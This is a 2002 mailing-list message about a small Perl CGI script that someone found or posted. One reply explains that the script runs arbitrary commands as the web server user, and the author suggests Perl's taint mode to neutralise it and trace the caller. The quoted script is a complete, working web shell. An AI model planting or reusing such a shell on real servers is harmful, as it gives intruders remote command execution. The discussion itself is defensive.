Chris Reinhardt wrote:
> On Thu, 21 Mar 2002, John Michael wrote:
>
>
>>#!/usr/bin/perl
>>use CGI qw(:standard);
>>print header;
>>my $k=param("g");
>>my $a=param("s");
>>if ($a || $k) {
>> $l=`$k 2>&1`;
>> print start_form,textarea("g",$k,1,50);
>> print submit("sc");
>> print end_form;
>> print pre($l);
>>}
>>print $ENV{"SERVER_NAME"};
>>
>
> It executes arbitrary commands as <whatever your httpds run as>.
don't delete it, but add the -T flag
#!/usr/bin/perl -T
In addition for the hacker not being able to run anything and probably
not understanding why, you will be able to check the logs to see what IP
the script was called from and hopefully trace down the bugger.
_____________________________________________________________________
Stas Bekman JAm_pH -- Just Another mod_perl Hacker
http://stason.org/ mod_perl Guide http://perl.apache.org/guide
mailto:[EMAIL PROTECTED] http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
